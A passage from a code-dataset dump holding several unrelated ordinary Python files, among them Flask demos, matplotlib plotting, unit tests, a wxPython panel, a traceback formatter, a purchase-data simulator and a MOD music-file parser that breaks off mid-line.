{cestos[userID]}\"\n\n@app.route(\"/atribuiID\")\ndef atribuiID():\n\n novoID = 'ab5bc01'\n cestos[novoID] = []\n resp = make_response('ID atribuído!')\n resp.set_cookie('userID', novoID)\n return resp\n\nif __name__ == \"__main__\":\n app.run(debug=False)\n ","sub_path":"uatla/LDSW/Aula06/codigos/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486391500","text":"# flake8: noqa\n# isort:skip_file\n\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\nfrom catalyst.tools import settings\n\ntry:\n from catalyst.contrib.utils.cv.image import (\n has_image_extension,\n imread,\n imwrite,\n imsave,\n mask_to_overlay_image,\n mimread,\n mimwrite_with_meta,\n )\nexcept ImportError as ex:\n if settings.cv_required:\n logger.warning(\n \"some of catalyst-cv dependencies not available,\"\n \" to install dependencies, run `pip install catalyst[cv]`.\"\n )\n raise ex\n\nfrom catalyst.contrib.utils.cv.tensor import (\n tensor_from_rgb_image,\n tensor_to_ndimage,\n)\n","sub_path":"catalyst/contrib/utils/cv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618165586","text":"from threading import Timer\nimport time\nimport socket\nfrom time import sleep\nUDP_PORT = 64123\nUDP_IP = \"\"\nMESSAGE = \"sveglia\"\nsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\nsock.bind((UDP_IP,UDP_PORT))\nsock.sendto(MESSAGE, (\"10.0.1.108\", 64123))\n\n\nwhile (True):\n try:\n sock.settimeout(5.0)\n print(\"Aspetto dei dati\")\n data, addr = sock.recvfrom(1024)\n print(data)\n except socket.timeout:\n sock.settimeout(None)\n print(\"Time-out di comunicazione\")\n MESSAGE = \"STOP\"\n sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n sock.bind((UDP_IP,UDP_PORT))\n sock.sendto(MESSAGE, (\"10.0.1.108\", 64123))","sub_path":"tempWifi.py","file_name":"tempWifi.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438194672","text":"from matplotlib.backends.backend_pdf import PdfPages\nfrom ..Hyperion.hyp_read import *\nfrom ..Hyperion.hyp_hst import *\nfrom ..Hyperion.hyp_out import *\nfrom ..Hyperion.hyp_star import *\n\nimport matplotlib.pyplot as plt\n\nplotdir = '/Users/sudhirraskutti/Desktop/Thesis/PaperI/Figures/'\ndatadir = '/u/raskutti/PhD/Hyperion/Tests/RadParGrav/'\nhstfile = 'id0/RadParGrav.hst'\noutfile = 'RadParGrav.out'\nhostname = 'raskutti@bellona.astro.princeton.edu'\n\nysize = 0.25 * 11.69\nxsize = 0.4 * 8.27\nfontsize = '10'\n\ndflist = ['UV_M1.0e4_R8.0_N128_Tf4/', 'UV_M1.0e4_R8.0_N128_Tf4_NF/']\nnds = len(dflist)\ntimes = []\nmasses = []\n\nfor i in xrange(0,nds):\n datafolder = dflist[i]\n outlines = read_outfile(hostname,datadir + datafolder + outfile)\n hstdata = read_hstfile(hostname,datadir + datafolder + hstfile)\n tff = out_tff(outlines)\n mcloud = out_mcloud(outlines)\n time = hst_time(hstdata, tff)\n mstar = hst_mstar(hstdata, mcloud)\n mgas = hst_mgas(hstdata, mcloud)\n mass = mgas[0] - mstar - mgas\n mass = hst_mof(hstdata, mcloud, tff)\n times.append(time)\n masses.append(mass)\n\nplt.figure(figsize = [xsize,ysize])\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif', size=fontsize)\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif', size='12')\n\nplt.subplot(1,1,1)\nfor i in xrange(0,nds):\n plt.plot(times[i], masses[i])\nplt.axis([0,3,0,1])\nplt.xticks([])\nplt.yticks([0,0.5,1])\n\n#plt.xlabel(r\"$\\displaystyle t / t_{\\rm ff}$\")\nplt.ylabel(r\"$\\displaystyle M / M_{\\rm cl,0}$\")\nplt.text(0.05*3,0.9*1.5,r\"$\\displaystyle(a)$\")\n\npp = PdfPages(plotdir + 'ftest.pdf')\npp.savefig()\npp.close()\n\n\n","sub_path":"RadiationSims/Python/Experimental/pmof.py","file_name":"pmof.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176627800","text":"import unittest\n\nfrom models.session import Session\nfrom models.member import Member\nfrom models.booking import Booking\n\n\nclass TestBooking(unittest.TestCase):\n\n def setUp(self):\n self.session_1 = Session(\"Swimming\", \"Fri 24th\", \"this is a description\", 2)\n self.session_2 = Session(\"Swimming\", \"Fri 24th\", \"this is a description\", 3)\n self.session_3 = Session(\"Swimming\", \"Fri 24th\", \"this is a description\", 2)\n\n self.member_1 = Member(\"john jones\", \"fake@gmai.com\", False)\n self.member_2 = Member(\"john jones\", \"fake@gmai.com\", False)\n self.member_3 = Member(\"mary bell\", \"mary@fake.com\", True) \n\n self.booking_1 = Booking(self.member_1, self.session_1)\n self.booking_2 = Booking(self.member_2, self.session_1)\n\n self.bookings = [self.booking_1, self.booking_2]\n\n\n def test_booking(self):\n self.assertEqual(self.member_1, self.booking_1.member)\n\n","sub_path":"tests/booking_test.py","file_name":"booking_test.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"19446339","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 26 15:42:51 2012\r\n\r\n@author: kkhan\r\n\"\"\"\r\n\r\nimport wx \r\n\r\nclass ad_panel(wx.Panel): \r\n def __init__(self,parent,size=(400,300)): \r\n super(ad_panel,self).__init__(parent,-1,size,style=wx.SUNKEN_BORDER)\r\n \r\n wx.StaticText(self, -1, \"This is an example of static text\", \r\n (100, 10)) \r\n \r\n str = \"You can also change the font.\" \r\n self.text = wx.StaticText(self, -1, str, (20, 50)) \r\n font = wx.Font(18, wx.DECORATIVE, \r\n wx.ITALIC, wx.NORMAL) \r\n self.text.SetFont(font) \r\n \"\"\"\r\n wx.StaticText(self, -1, \r\n \"Your text\\ncan be split\\n\" \r\n \"over multiple lines\\n\\neven blank ones\", (20,150)) \r\n wx.StaticText(self, -1, \r\n \"Multi-line text\\ncan also\\n\" \r\n \"be right aligned\\n\\neven with a blank\", (220,150), \r\n style=wx.ALIGN_RIGHT) \"\"\" \r\n \r\n def ShowText(self,text):\r\n self.text.SetLabel(text)\r\n","sub_path":"menus/Account_panel/AccountDetail.py","file_name":"AccountDetail.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"178141705","text":"# coding: utf8\nfrom __future__ import unicode_literals, print_function\n\nfrom .util import color, supports_ansi, NO_UTF8\n\n\nLINE_EDGE = \"└─\" if not NO_UTF8 else \"|_\"\nLINE_FORK = \"├─\" if not NO_UTF8 else \"|__\"\nLINE_PATH = \"──\" if not NO_UTF8 else \"__\"\n\n\nclass TracebackPrinter(object):\n def __init__(\n self,\n color_error=\"red\",\n color_tb=\"blue\",\n color_highlight=\"yellow\",\n indent=2,\n tb_base=None,\n tb_exclude=tuple(),\n ):\n \"\"\"Initialize a traceback printer.\n\n color_error (unicode / int): Color name or code for errors.\n color_tb (unicode / int): Color name or code for traceback headline.\n color_highlight (unicode / int): Color name or code for highlights.\n indent (int): Indentation in spaces.\n tb_base (unicode): Name of directory to use to show relative paths. For\n example, \"thinc\" will look for the last occurence of \"/thinc/\" in\n a path and only show path to the right of it.\n tb_exclude (tuple): List of filenames to exclude from traceback.\n RETURNS (TracebackPrinter): The traceback printer.\n \"\"\"\n self.color_error = color_error\n self.color_tb = color_tb\n self.color_highlight = color_highlight\n self.indent = \" \" * indent\n self.tb_base = \"/{}/\".format(tb_base) if tb_base else None\n self.tb_exclude = tuple(tb_exclude)\n self.supports_ansi = supports_ansi()\n\n def __call__(self, title, *texts, **settings):\n \"\"\"Output custom formatted tracebacks and errors.\n\n title (unicode): The message title.\n *texts (unicode): The texts to print (one per line).\n highlight (unicode): Optional sequence to highlight in the traceback,\n e.g. the bad value that caused the error.\n tb (iterable): The traceback, e.g. generated by traceback.extract_stack().\n RETURNS (unicode): The formatted traceback. Can be printed or raised\n by custom exception.\n \"\"\"\n highlight = settings.get(\"highlight\", False)\n tb = settings.get(\"tb\", None)\n if self.supports_ansi: # use first line as title\n title = color(title, fg=self.color_error, bold=True)\n info = \"\\n\" + \"\\n\".join([self.indent + text for text in texts]) if texts else \"\"\n tb = self._get_traceback(tb, highlight) if tb else \"\"\n msg = \"\\n\\n{}{}{}{}\\n\".format(self.indent, title, info, tb)\n return msg\n\n def _get_traceback(self, tb, highlight):\n # Exclude certain file names from traceback\n tb = [record for record in tb if not record[0].endswith(self.tb_exclude)]\n tb_range = tb[-5:-2]\n tb_list = [\n self._format_traceback(path, line, fn, text, i, len(tb_range), highlight)\n for i, (path, line, fn, text) in enumerate(tb_range)\n ]\n tb_data = \"\\n\".join(tb_list).strip()\n title = \"Traceback:\"\n if self.supports_ansi:\n title = color(title, fg=self.color_tb, bold=True)\n return \"\\n\\n{indent}{title}\\n{indent}{tb}\".format(\n title=title, tb=tb_data, indent=self.indent\n )\n\n def _format_traceback(self, path, line, fn, text, i, count, highlight):\n template = \"{base_indent}{indent} {fn} [{line}] in {path}{text}\"\n indent = (LINE_EDGE if i == count - 1 else LINE_FORK) + LINE_PATH * i\n if self.tb_base and self.tb_base in path:\n path = path.rsplit(self.tb_base, 1)[1]\n text = self._format_user_error(text, i, highlight) if i == count - 1 else \"\"\n if self.supports_ansi:\n fn = color(fn, bold=True)\n path = color(path, underline=True)\n return template.format(\n base_indent=self.indent,\n line=line,\n indent=indent,\n text=text,\n fn=fn,\n path=path,\n )\n\n def _format_user_error(self, text, i, highlight):\n spacing = \" \" * i + \" >>>\"\n if self.supports_ansi:\n spacing = color(spacing, fg=self.color_error)\n if highlight and self.supports_ansi:\n formatted_highlight = color(highlight, fg=self.color_highlight)\n text = text.replace(highlight, formatted_highlight)\n return \"\\n{} {} {}\".format(self.indent, spacing, text)\n","sub_path":"venv/Lib/site-packages/wasabi/traceback.py","file_name":"traceback.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"280821378","text":"\"\"\"Tests for function module\"\"\"\n\nimport unittest\nfrom .. import parse_utils\n\nclass TestFunctions(unittest.TestCase):\n \"\"\"Test functionality of the functions module\"\"\"\n\n def test_return_kw_none(self):\n \"\"\"Test the response when there is no return keyword\"\"\"\n source = \\\n''' def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):\n \"\"\"_handle_long_word(chunks : [string],\n cur_line : [string],\n cur_len : int, width : int)\n\n Handle a chunk of text (most likely a word, not whitespace) that\n is too long to fit in any line.\n \"\"\"\n # Figure out when indent is larger than the specified width, and make\n # sure at least one character is stripped off on every pass\n if width < 1:\n space_left = 1\n else:\n space_left = width - cur_len\n\n # If we're allowed to break long words, then do so: put as much\n # of the next chunk onto the current line as will fit.\n if self.break_long_words:\n cur_line.append(reversed_chunks[-1][:space_left])\n reversed_chunks[-1] = reversed_chunks[-1][space_left:]\n\n # Otherwise, we have to preserve the long word intact. Only add\n # it to the current line if there's nothing already there --\n # that minimizes how much we violate the width constraint.\n elif not cur_line:\n cur_line.append(reversed_chunks.pop())\n\n # If we're not allowed to break long words, and there's already\n # text on the current line, do nothing. Next time through the\n # main loop of _wrap_chunks(), we'll wind up here again, but\n # cur_len will be zero, so the next line will be entirely\n # devoted to the long word that we can't handle right now.\n'''\n result = parse_utils.parse_return_keyword(source)\n self.assertEqual(result, set())\n\n def test_return_kw_return(self):\n \"\"\"Test the response when there is a return keyword\"\"\"\n source = \\\n'''def fill(text, width=70, **kwargs):\n \"\"\"Fill a single paragraph of text, returning a new string.\n\n Reformat the single paragraph in 'text' to fit in lines of no more\n than 'width' columns, and return a new string containing the entire\n wrapped paragraph. As with wrap(), tabs are expanded and other\n whitespace characters converted to space. See TextWrapper class for\n available keyword args to customize wrapping behaviour.\n \"\"\"\n w = TextWrapper(width=width, **kwargs)\n return w.fill(text)\n'''\n result = parse_utils.parse_return_keyword(source)\n self.assertEqual(result, set([('return', 'w.fill(text)')]))\n\n def test_return_kw_yield(self):\n \"\"\"Test the response when there is a yield keyword\"\"\"\n source = \\\n'''def firstn(n):\n num = 0\n while num < n:\n yield num\n num += 1\n yield num+7\n'''\n result = parse_utils.parse_return_keyword(source)\n self.assertEqual(result, set([('yield', 'num'), ('yield', 'num+7')]))\n\n def test_parse_exceptions(self):\n \"\"\"Test that exceptions are found in functions\"\"\"\n source = \\\n'''def demo_bad_catch():\n try:\n raise ValueError('represents a hidden bug, do not catch this')\n raise Exception('This is the exception you expect to handle')\n raise ValueError('Another Value Error, but it's only shown once')\n except Exception as error:\n print('caught this error: ' + repr(error))\n'''\n result = parse_utils.parse_function_exceptions(source)\n self.assertEqual(result, set([('raise', 'Exception'), ('raise', 'ValueError')]))\n\n\n def test_parse_class_attributes_simple(self):\n \"\"\"Test class attributes are correctly garnered from a simple class\"\"\"\n source = \\\n'''class TestClass(object):\n class_attr_1 = 0\n class_attr_2 = 2\n class_attr_override = 3\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n'''\n result = parse_utils.parse_class_attributes(source)\n self.assertEqual(result, set([('class_attr_1', '0'),\n ('class_attr_2', '2'),\n ('class_attr_override', '0'),\n ('inst_attr_1', '1'),\n ('inst_attr_2', '2')]))\n\n def test_parse_class_attributes_nested_indented(self):\n \"\"\"Test class attributes are correctly garnered from a simple class\"\"\"\n source = \\\n''' class TestClass(object):\n class_attr_1 = 0\n class_attr_2 = 2\n class_attr_override = 3\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n\n class ChildClass(object):\n sub_class_attr = 0\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n'''\n result = parse_utils.parse_class_attributes(source)\n self.assertEqual(result, set([('class_attr_1', '0'),\n ('class_attr_2', '2'),\n ('class_attr_override', '0'),\n ('inst_attr_1', '1'),\n ('inst_attr_2', '2')]))\n\n def test_parse_class_attributes_ignored_nested_class(self):\n \"\"\"Test class attributes from a nested class are ignored\"\"\"\n source = \\\n'''class TestClass(object):\n class_attr_1 = 0\n class_attr_2 = 2\n class_attr_override = 3\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n\n class ChildClass(object):\n sub_class_attr = 0\n\n def __init__(self):\n self.inst_attr_1 = 1\n self.inst_attr_2 = 2\n self.class_attr_override = 0\n'''\n result = parse_utils.parse_class_attributes(source)\n self.assertEqual(result, set([('class_attr_1', '0'),\n ('class_attr_2', '2'),\n ('class_attr_override', '0'),\n ('inst_attr_1', '1'),\n ('inst_attr_2', '2')]))\n","sub_path":"pydocstring/tests/test_parse_utils.py","file_name":"test_parse_utils.py","file_ext":"py","file_size_in_byte":6314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67744462","text":"from flask import Flask\r\nimport subprocess\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return 'Hello World!'\r\n\r\n\r\n@app.route('/do-ocr/')\r\ndef pushForOCR():\r\n strImagePath = request.args.get(\"path\").lower()\r\n\r\n # 'text' variable contains the text from @strImagePath\r\n text = subprocess.check_output(['tesseract', strImagePath, 'stdout'])\r\n \r\n\r\nif __name__ == '__main__':\r\n app.debug = True\r\n app.run(host=\"0.0.0.0\")\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283040996","text":"from datetime import datetime\nfrom collections import OrderedDict\n\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass Commodity:\n def __init__(self):\n pass\n food = \"Food & non-alcoholic drinks\"\n alcohol_tobacco = \"Alcoholic drinks, tobacco & narcotics\"\n clothing = \"Clothing & footwear\"\n housing = \"Housing (net), fuel & power\"\n household = \"Household goods & services\"\n health = \"Health\"\n transport = \"Transport\"\n communication = \"Communication\"\n recreation_culture = \"Recreation & culture\"\n education = \"Education\"\n restaurants_hotels = \"Restaurants & hotels\"\n misc_goods = \"Miscellaneous goods & services\"\n other = \"Other expenditure items\"\n\nCOMMODITIES = [Commodity.food, Commodity.alcohol_tobacco, Commodity.clothing,\n Commodity.housing, Commodity.household, Commodity.health,\n Commodity.transport, Commodity.communication,\n Commodity.recreation_culture, Commodity.education,\n Commodity.restaurants_hotels, Commodity.misc_goods,\n Commodity.other]\n\n\nclass AgeGroup:\n def __init__(self, name, commodity_probas):\n self.name = name\n self.commodity_probas = commodity_probas\n\n\nclass AgeGroups:\n def __init__(self):\n pass\n # Data source:\n # http://tinyurl.com/hyot8qu\n # http://tinyurl.com/jjz6x36\n # Data description: Table A10 - Household expenditure as a percentage of\n # total expenditure by age of household reference person, 2012\n # Note: The one who prepared the data has rounded percentages to integers,\n # which leads to a situation where the sum of percentages won't sum up to\n # 100. We can fix this by dividing the array by the sum of elements\n # in the array.\n less_than_30 = AgeGroup(name=\"Less than 30\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 9, 2, 5, 24, 5, 0, 12, 3, 10, 3, 9, 7, 11])))\n from_30_to_49 = AgeGroup(name=\"30 to 49\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 11, 2, 5, 13, 5, 1, 13, 3, 12, 2, 8, 8, 16])))\n from_50_to_64 = AgeGroup(name=\"50 to 64\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 12, 3, 5, 11, 6, 1, 14, 3, 13, 1, 9, 8, 13])))\n from_65_to_74 = AgeGroup(name=\"65 to 74\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 14, 3, 4, 12, 6, 2, 13, 3, 16, 1, 8, 8, 11])))\n more_than_75 = AgeGroup(name=\"75 or over\",\n commodity_probas=OrderedDict(zip(COMMODITIES, [\n 15, 2, 3, 16, 7, 4, 9, 3, 11, 0, 7, 9, 12])))\n\n @staticmethod\n def get_all_age_groups():\n all_vars = []\n for _, var in vars(AgeGroups).items():\n if isinstance(var, AgeGroup):\n all_vars.append(var)\n return all_vars\n\n\ndef visualize_spending_per_age_group():\n # Put the data to Pandas DataFrame\n age_groups_df = pd.DataFrame()\n for g in AgeGroups.get_all_age_groups():\n probas = np.array(list(g.commodity_probas.values()))\n age_groups_df[g.name] = probas/probas.sum() * 100.0\n # Sort the columns in right order\n age_groups_df = age_groups_df[[\n AgeGroups.less_than_30.name, AgeGroups.from_30_to_49.name,\n AgeGroups.from_50_to_64.name, AgeGroups.from_65_to_74.name,\n AgeGroups.more_than_75.name]]\n # Visualize\n age_groups_df = age_groups_df.transpose()\n ax = age_groups_df.plot.bar(\n stacked=True, legend='reverse',\n colormap='Spectral', rot=0, figsize=(10, 7))\n ax.set_ylim((0, 100))\n ax.set_ylabel(\"Proportion (%)\", fontsize=10)\n ax.set_xlabel(\"Age group\", fontsize=10)\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles[::-1], COMMODITIES[::-1], title='Commodities',\n loc='upper left', bbox_to_anchor=(1, 1))\n plt.subplots_adjust(right=0.7)\n # plt.savefig('spending_per_age_group.png')\n\n\ndef get_random_hour_of_day(n_hours=1000, visualize=False):\n transactions_per_hour = np.array([\n # Taken from BI348Chapter02Finished.xlsx, sheet: Time Histogram\n # Created from 26524 Boomerang Inc online sales transactions\n # https://people.highline.edu/mgirvin/excelisfun.htm\n # https://www.youtube.com/watch?v=3YeoX1Cl7Og\n 219, 234, 1579, 1813, 1773, 984, 226, 211, 213, 341, 966, 4062, 4174,\n 1962, 337, 318, 975, 2025, 2094, 934, 333, 249, 246, 256])\n hour_probas = np.round(\n transactions_per_hour.astype(float) / transactions_per_hour.sum(),\n decimals=3)\n if visualize:\n ax = plt.figure().add_subplot(111)\n ax.bar(range(len(hour_probas)), hour_probas)\n ax.set_xlim((0, len(hour_probas)))\n ax.set_xticks(range(len(hour_probas)))\n ax.set_ylabel('Probability of transaction')\n ax.set_xlabel('Hour')\n plt.show()\n return np.random.choice(\n a=len(transactions_per_hour), size=n_hours,\n # p = The probabilities associated with each entry in a\n p=hour_probas)\n\n\ndef get_random_weekday(n_days=1000, visualize=False):\n sales_per_weekday = np.array([\n # Taken from http://g3cfo.com/little-fun-simple-flash-report/\n # Created from restaurant sales\n 10237, 8365, 9018, 9547, 13313, 19055, 17660])\n weekday_probas = np.round(\n sales_per_weekday.astype(float) / sales_per_weekday.sum(), decimals=3)\n if visualize:\n fig = plt.figure()\n fig.subplots_adjust(bottom=0.2)\n ax = fig.add_subplot(111)\n ax.bar(range(len(weekday_probas)), weekday_probas)\n ax.set_xlim((0, len(weekday_probas)))\n ax.set_xticks(range(len(weekday_probas)))\n ax.set_xticklabels(['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday'],\n rotation=45, ha='left')\n ax.set_ylabel('Probability of transaction')\n ax.set_xlabel('Day of week')\n plt.show()\n return np.random.choice(\n a=len(sales_per_weekday), size=n_days,\n # p = The probabilities associated with each entry in a\n p=weekday_probas)\n\n\ndef simulate(n_persons=100,\n start_time=datetime(year=2010, month=1, day=1),\n end_time=datetime(year=2016, month=1, day=1)):\n random_hours = get_random_hour_of_day(n_hours=n_persons)\n random_weekdays = get_random_weekday(n_days=n_persons)\n\n # For debugging purposes, plot the sampled data\n for sampled_data in [random_hours, random_weekdays]:\n ax = plt.figure().add_subplot(111)\n _, unique_counts = np.unique(sampled_data, return_counts=True)\n ax.bar(range(len(unique_counts)), unique_counts)\n plt.show()\n","sub_path":"datasimulation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"78574460","text":"from sys import exit\nfrom modtrack import DP\n\ndef nibbles(bt):\n h = bt >> 4\n l = bt & 0x0F\n return h,l\n\ndef nibbles2byte(low,high):\n return high*16+low\n\ndef nibbles2(bt_array):\n nibble_array=[]\n for bt in bt_array:\n h,l=nibbles(bt)\n nibble_array.append(h)\n nibble_array.append(l)\n return nibble_array\n\ndef hexs(bt_array):\n hexout=\"\"\n for bt in bt_array:\n hexout=hexout+(hex(bt)[2:].zfill(2))\n return hexout.upper()\n\nformat = \"\"\nsamples=[]\npatterns=[]\npattern_table=None\nnr_playedpatterns=0\n\ndef amigaword_toint(b1,b2):\n return b2*256+b1\n\nMOD_FORMATS = {\n 'STK.' : (\n \"Ultimate Soundtracker (Original) 4 channel / 15 instruments\",\n 15, True\n ),\n 'M.K.' : (\n \"Protracker 4 channel / 31 instruments\",\n 31, True\n ),\n 'M!K!' : (\n \"Protracker 4 channel / 31 instruments / >64 patterns\",\n 31, False\n ),\n 'FLT4' : (\n \"Startracker 4 channel / 31 instruments\",\n 31, True\n ),\n 'FLT8' : (\n \"Startracker 8 channel / 31 instruments\",\n 31, False\n ),\n '2CHN' : (\n \"Fasttracker 2 channel / 31 instruments\",\n 31, False\n ),\n '4CHN' : (\n \"Fasttracker 4 channel / 31 instruments\",\n 31, True\n ),\n '6CHN' : (\n \"Fasttracker 6 channel / 31 instruments\",\n 31, False\n ),\n '8CHN' : (\n \"Fasttracker 8 channel / 31 instruments\",\n 31, False\n ),\n 'CD81' : (\n \"Atari oktalyzer 8 channel / 31 instruments\",\n 31, False\n ),\n 'OKTA' : (\n \"Atari oktalyzer 8 channel / 31 instruments\",\n 31, False\n ),\n 'OCTA' : (\n \"Atari oktalyzer 8 channel / 31 instruments\",\n 31, False\n ),\n '16CN' : (\n \"Taketracker 16 channel / 31 instruments\",\n 31, False\n ),\n '32CN' : (\n \"Taketracker 32 channel / 31 instruments\",\n 31, False\n )\n}\n\ndef formdesc_from_bytes(bytes4):\n try:\n format = bytes4.decode(\"utf-8\")\n except UnicodeDecodeError:\n format = \"STK.\"\n if bytes4 == b'\\x00\\x00\\x00\\x00':\n format = \"STK.\"\n if not format.isprintable():\n format = \"STK.\"\n return format, MOD_FORMATS[format]\n\n# https://wiki.multimedia.cx/index.php/Protracker_Module\n# http://www.fileformat.info/format/mod/corion.htm\n# http://elektronika.kvalitne.cz/ATMEL/MODplayer3/doc/MOD-FORM.TXT\n# http://www.eblong.com/zarf/blorb/mod-spec.txt\n# http://web.archive.org/web/20120806024858/http://16-bits.org/mod/\n# ftp://ftp.modland.com/pub/documents/format_documentation\n# /FireLight%20MOD%20Player%20Tutorial.txt\n\ndef read_module(filename):\n global samples,patterns,pattern_table,nr_playedpatterns\n\n with open(filename, 'rb') as fh:\n barr = bytearray(fh.read())\n\n # Compressed with PowerPacker, we can't decode this\n if barr[0:4] == \"PP20\":\n return None\n\n nr_channels = 4\n id_bytes = barr[1080:1084]\n id, (desc, nr_samples, compatible) = formdesc_from_bytes(id_bytes)\n if not compatible:\n errmsg = f'Format {id} ({desc}) is not supported!'\n raise ValueError(errmsg)\n\n songtitle = barr[0:20].decode(\"utf-8\")\n\n fmt = 'song \"%s\" type %s'\n DP.header('LOADING', fmt, (songtitle, desc))\n\n offset = 20\n for sample in range (0, nr_samples):\n sample = {}\n sample[\"name\"] = barr[offset:offset + 22]\n sample['name'] = sample['name'].decode(\"utf-8\").replace('\\x00', '')\n\n # sample len in words (1word=2bytes). 1st word overwritten by tracker\n sample['len'] = 2*int.from_bytes(\n barr[offset+22:offset+24],\n byteorder=\"big\",signed=False)\n sample[\"finetune\"] = barr[offset + 24]#.decode(\"utf-8\")\n sample[\"volume\"] = barr[offset + 25]#.decode(\"utf-8\")\n sample[\"repeat_from\"] = 2 * int.from_bytes(barr[offset + 26:offset + 28],byteorder=\"big\",signed=False)\n sample[\"repeat_len\"] = 2 * int.from_bytes(barr[offset + 28:offset + 30],byteorder=\"big\",signed=False)\n\n fmt = 'sample \"%-20s\" %5d bytes repeat %2d:%2d vol %2d'\n args = (sample['name'], sample['len'],\n sample['repeat_from'], sample['repeat_len'],\n sample['volume'])\n DP.print(fmt, args)\n samples.append(sample)\n offset=offset+30\n\n DP.print('offset %d', offset)\n\n #offset=470 15 samples Ultimate Soundtracker, id at 600\n #offset=950 31 samples Protracker and similar, id at 1080\n\n nr_playedpatterns=barr[offset] # hex value was loaded as byte and is automatically converted to int\n offset=offset+1\n dummy127=barr[offset]\n offset=offset+1\n pattern_table=barr[offset:offset+128]\n offset=offset+128\n\n DP.print('offset %d', offset)\n # Only other format then Ultimate Soundtracker have bytes to\n # specify format\n if not format == \"STK.\":\n dummyformat = barr[offset:offset+4].decode(\"utf-8\")\n offset = offset+4\n\n DP.print('patterns %d, format %s' , (nr_playedpatterns, format))\n\n #read nr patterns stored\n #equal to the highest patternnumber in the song position table(at offset 952 - 1079).\n nr_patterns_stored=0\n for chnr in range(128):\n DP.print('pattern_table[%3d] = %d', (chnr, pattern_table[chnr]))\n # Check for first not possible because 0 is also a valid\n # pattern number\n if pattern_table[chnr]!=0:\n nr_patternsplayed=chnr+1\n if (pattern_table[chnr]+1)>nr_patterns_stored:\n nr_patterns_stored=(pattern_table[chnr]+1)\n\n pattern_table=pattern_table[:nr_playedpatterns]\n DP.print(\"nr patterns stored: %d\", nr_patterns_stored)\n\n notelist = [\"C-\", \"C#\", \"D-\", \"D#\", \"E-\", \"F-\", \"F#\", \"G-\", \"G#\", \"A-\", \"A#\", \"B-\"]\n periods = [\n 1712,1616,1525,1440,1357,1281,1209,1141,1077,1017, 961, 907,\n 856, 808, 762, 720, 678, 640, 604, 570, 538, 508, 480, 453,\n 428, 404, 381, 360, 339, 320, 302, 285, 269, 254, 240, 226,\n 214, 202, 190, 180, 170, 160, 151, 143, 135, 127, 120, 113,\n 107, 101, 95, 90, 85, 80, 76, 71, 67, 64, 60, 57,\n ]\n def period2note(period):\n notenr=-1\n for nr,val in enumerate(periods):\n if val==period:\n notenr=nr % 12\n oct=nr//12\n if notenr>=0:\n note=notelist[notenr]+str(oct)\n else:\n note=\"---\"\n return note\n\n patterns = []\n for pattern in range (0,nr_patterns_stored):\n pattern=[]\n for row in range(64):\n row=[]\n txt=\"\"\n txt2= \"\"\n for channel in range(nr_channels):\n bytes = barr[offset:offset+4]\n\n nibbles=hexs(bytes)\n samplenr=int(nibbles[0]+nibbles[4],16)\n samplehex=nibbles[0]+nibbles[4]\n\n\n\n noteperiod=int(nibbles[1:4],16)\n\n effect = nibbles[5:8]\n txt2=txt2+\"{} -> {} {} {} | \".format(nibbles,noteperiod,samplehex,effect)\n note=period2note(noteperiod)\n seq_text=\"{:<3} {} {:<3}\".format(note,samplehex,effect)\n row.append(seq_text)\n #txt = txt + seq_text+ \" \"\n txt=txt+\"|\"+nibbles+\"|\"+str(noteperiod)\n offset=offset+4\n pattern.append(row)\n patterns.append(pattern)\n\n fmt = '%2d, offset %6d, len %5d'\n for i, sample in enumerate(samples):\n sample_len=sample[\"len\"]\n # first two bytes always two zeros, and used for repeating is\n # the sample is to be terminated.\n sample_data=barr[offset+2:offset+sample_len]\n sample['data'] = sample_data\n DP.print(fmt, (i, offset, sample_len))\n offset = offset+sample_len\n if offset != len(barr):\n print(\"ERROR....NOT ALL BYTES PROCESSED! \",\n 